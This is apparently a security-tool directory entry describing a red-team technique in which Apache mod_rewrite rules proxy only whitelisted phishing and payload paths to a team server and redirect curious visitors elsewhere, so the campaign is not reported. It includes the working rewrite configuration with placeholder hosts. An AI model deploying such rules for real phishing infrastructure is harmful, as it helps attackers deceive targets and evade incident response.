Invalid URI Redirection with Apache mod_rewrite Logo

Invalid URI Redirection with Apache mod_rewrite

0
Free
Visit Website

There have been times when a curious phish recipient or a zealous help desk staff has loaded the phishing link in their browser and decided to take a peek at a higher directory or the root domain. Of course, most times there isn’t much else site to see. In those cases, the chances of being reported to IR went up significantly, sometimes leading to a phishing campaign being blocked. This is where invalid URI redirection comes in handy. We can whitelist resources the Apache server will proxy for the targets and redirect any other requests to the target’s real domain or another page of our choosing. In the demo below, the user navigates to spoofdomain.com/really/long/url.html and is served a page; however, when the user navigates to spoofdomain.com/really/ the browser is redirected to google.com. RewriteEngine On RewriteCond %{REQUEST_URI} ^/(profiler|payload)/?$ [NC,OR] RewriteCond %{HTTP_REFERER} ^http://SPOOFED-DOMAIN.com [NC] RewriteRule ^.*$ http://TEAMSERVER-IP%{REQUEST_URI} [P] RewriteRule ^.*$ http://REDIRECTION-URL.com/? [L,R=302] Line by line explanation: Enable the rewrite engine If the request's URI is either '/profiler' or '/payload' (with an optional trailing slash), ignoring case; OR If the request's referer starts with 'http://SPOOFED-DOMAIN.com', ignoring case;

FEATURES

ALTERNATIVES

WackoPicko is a vulnerable website with known vulnerabilities, now available as a Docker image and included in the OWASP Broken Web Applications Project.

An open-source web application security scanner framework that identifies vulnerabilities in web applications.

A deliberately weak and insecure implementation of GraphQL for testing and practicing GraphQL security

FingerprintJS is a client-side browser fingerprinting library that provides a unique visitor identifier unaffected by incognito mode.

Veracode is an intelligent software security platform that helps developers and security teams secure code, find and fix flaws, and automate remediation.

A software composition analysis tool that identifies vulnerabilities, malicious code, and license risks in open source dependencies throughout the software development lifecycle.

A GitHub application that performs automated security code reviews by analyzing contextual security aspects of code changes during pull requests.

IDAPython plugin for generating Yara rules/patterns from x86/x86-64 code through parameterization.